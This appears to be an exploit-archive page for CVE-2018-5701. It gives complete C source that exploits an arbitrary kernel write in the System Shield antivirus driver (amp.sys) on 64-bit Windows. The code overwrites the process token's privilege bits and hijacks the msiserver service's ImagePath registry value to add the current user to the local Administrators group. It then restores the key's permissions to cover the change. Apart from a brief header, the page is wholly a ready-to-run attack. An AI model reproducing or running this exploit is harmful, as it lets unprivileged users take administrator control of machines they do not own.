System Shield 5.0.0.136 - Privilege Escalation



EKU-ID: 7314 CVE: 2018-5701 OSVDB-ID:
Author: Parvez Anwar Published: 2018-01-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
 
Exploit Title    - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation
Date             - 29th January 2018
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.iolo.com/
Tested Version   - 5.0.0.136
Driver Version   - 5.4.11.1 - amp.sys
Tested on OS     - 64bit Windows 7 and Windows 10 (1709)
CVE ID           - CVE-2018-5701
Vendor fix url   -
Fixed Version    - 0day
Fixed driver ver - 0day
 
 
Check blogpost for details:
 
https://www.greyhathacker.net/?p=1006
 
*/
 
 
#include <stdio.h>
#include <windows.h>
#include <aclapi.h>
 
#pragma comment(lib,"advapi32.lib")
 
#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver"
 
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
 
 
typedef unsigned __int64 QWORD;
 
 
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
     ULONG       ProcessId;
     UCHAR       ObjectTypeNumber;
     UCHAR       Flags;
     USHORT      Handle;
     QWORD       Object;
     ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
 
 
typedef struct _SYSTEM_HANDLE_INFORMATION
{
     ULONG NumberOfHandles;
     SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
 
 
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     ULONG SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);
 
 
 
 
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
    _NtQuerySystemInformation   NtQuerySystemInformation;
    PSYSTEM_HANDLE_INFORMATION  pSysHandleInfo;
    ULONG                       i;
    PSYSTEM_HANDLE              pHandle;
    QWORD                       TokenAddress = 0;      
    DWORD                       nSize = 4096;
    DWORD                       nReturn;
    BOOL                        tProcess;   
    HANDLE                      hToken;
 
 
    if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
    {
        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
        return -1;
    }
 
    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1; 
    }
 
    do
    { 
        nSize += 4096;
        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
    
    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);  
 
    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
    {
 
        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
        {
            TokenAddress = pSysHandleInfo->Handles[i].Object;                     
        }
    }
 
    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
    return TokenAddress;   
}
 
 
 
int TakeOwnership()
{
     HANDLE           token;
     PTOKEN_USER      user = NULL;
     PACL             pACL = NULL;
     EXPLICIT_ACCESS  ea;  
     DWORD            dwLengthNeeded;
 
 
 
     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
     { 
         printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] OpenProcessToken successful");
 
     if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
     {
         printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError());
         ExitProcess(1);
     }
 
     user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded);
 
     if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded))
     {
         printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError());
         ExitProcess(1);
     }
 
     ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
 
// build DACL
 
     ea.grfAccessPermissions = KEY_ALL_ACCESS;
     ea.grfAccessMode = GRANT_ACCESS;
     ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
     ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
     ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
     ea.Trustee.ptstrName = (LPTSTR)user->User.Sid;
 
     if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS)
     {
         printf("\n[-] SetEntriesInAcl failure\n\n");
         ExitProcess(1);
     }   
     printf("\n[+] SetEntriesInAcl successful");
 
// Take ownership
    
     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS)
     {
         printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] Ownership '%s' successful", MSIEXECKEY);
 
// Modify DACL
 
     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS)
     {
         printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] Object's DACL successfully modified");
 
     LocalFree(pACL);
     CloseHandle(token);
 
     return 0;
}
 
 
 
int RestorePermissions()
{
     PACL             pOldDACL = NULL;
     PSID             pSIDAdmin = NULL;
     SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
 
 
 
     printf("\n[*] Restoring all permissions and value");
 
// Restore registry value
 
     WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V");
 
// Sid for the BUILTIN\Administrators group
 
     if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,  &pSIDAdmin))
     {
         printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError());
         ExitProcess(1);
     }
 
// Restore key ownership
    
     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS)
     {
         printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] Object's ownership successfully restored");
 
// Take copy of parent key
 
     if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS)
     {
         printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] Parent key object's DACL successfully saved");
 
// Restore key permissions
 
     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS)
     {
         printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] Object's DACL successfully restored");
 
     FreeSid(pSIDAdmin);
 
     return 0;
}
 
 
 
int WriteToRegistry(char command[])
{
     HKEY hkeyhandle;
 
     if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS)
     {
         printf("\n[-] Registry key failed to open %d\n\n", GetLastError());
         ExitProcess(1);
     }
 
     if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS)
     {
         printf("\n[-] Registry value failed to write %d\n\n", GetLastError());
         ExitProcess(1);
     }
 
     printf("\n[+] Registry key opened and value modified");
 
     RegCloseKey(hkeyhandle);
 
     return 0;
}
 
 
 
int TriggerCommand()
{
     STARTUPINFO           si;
     PROCESS_INFORMATION   pi;
 
 
     ZeroMemory(&si, sizeof(si));
     ZeroMemory(&pi, sizeof(pi));
     si.cb = sizeof(si);
 
     if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
     {
         printf("\n[-] CreateProcess failed %d", GetLastError());
         ExitProcess(1);
     }
     printf("\n[+] c:\\windows\\system32\\msiexec.exe launched");
     printf("\n[i] Account should now be in the local administrators group");
 
     CloseHandle(pi.hThread);
     CloseHandle(pi.hProcess);
    
     return 0;
}
 
 
 
int main(int argc, char *argv[])
{
    QWORD      TokenAddressTarget;
    QWORD      SepPrivilegesOffset = 0x40;
    QWORD      TokenAddress;
    HANDLE     hDevice;
    char       devhandle[MAX_PATH];
    DWORD      dwRetBytes = 0; 
    QWORD      inbuffer1[3] = {0};  
    QWORD      inbuffer2[3] = {0};     
    QWORD      ptrbuffer[1] = {0};           // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe  
    DWORD      currentusersize;
    char       currentuser[100];
    char       netcommand[MAX_PATH];           
 
 
 
    printf("-------------------------------------------------------------------------------\n");
    printf("  System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit  \n");
    printf("                 Tested on 64bit Windows 7 / Windows 10 (1709)                 \n");
    printf("-------------------------------------------------------------------------------\n");
 
    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
    printf("\n[i] Address of current process token 0x%p", TokenAddress);
 
    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget);
 
    inbuffer1[0] = 0x8;                      // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls
    inbuffer1[1] = ptrbuffer;                // QWORD2 - Address used for read and write
    inbuffer1[2] = TokenAddressTarget+1;     // QWORD3 - Arbitrary write address !!!
 
    inbuffer2[0] = 0x8;
    inbuffer2[1] = ptrbuffer;
    inbuffer2[2] = TokenAddressTarget+9;
 
    sprintf(devhandle, "\\\\.\\%s", "amp");
 
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }  
 
    printf("\n[~] Press any key to continue . . .\n");
    getch();
 
    DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL);
    DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL);
 
    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
    CloseHandle(hDevice);
    
    currentusersize = sizeof(currentuser);
 
    if (!GetUserName(currentuser, &currentusersize))
    {
        printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
        return -1;
    }
 
    printf("[*] Adding current user '%s' account to the local administrators group", currentuser);
 
    sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);
 
    TakeOwnership(); 
    WriteToRegistry(netcommand); 
    TriggerCommand();
    Sleep(1000);
    RestorePermissions();
    printf("\n\n");
 
    return 0;
}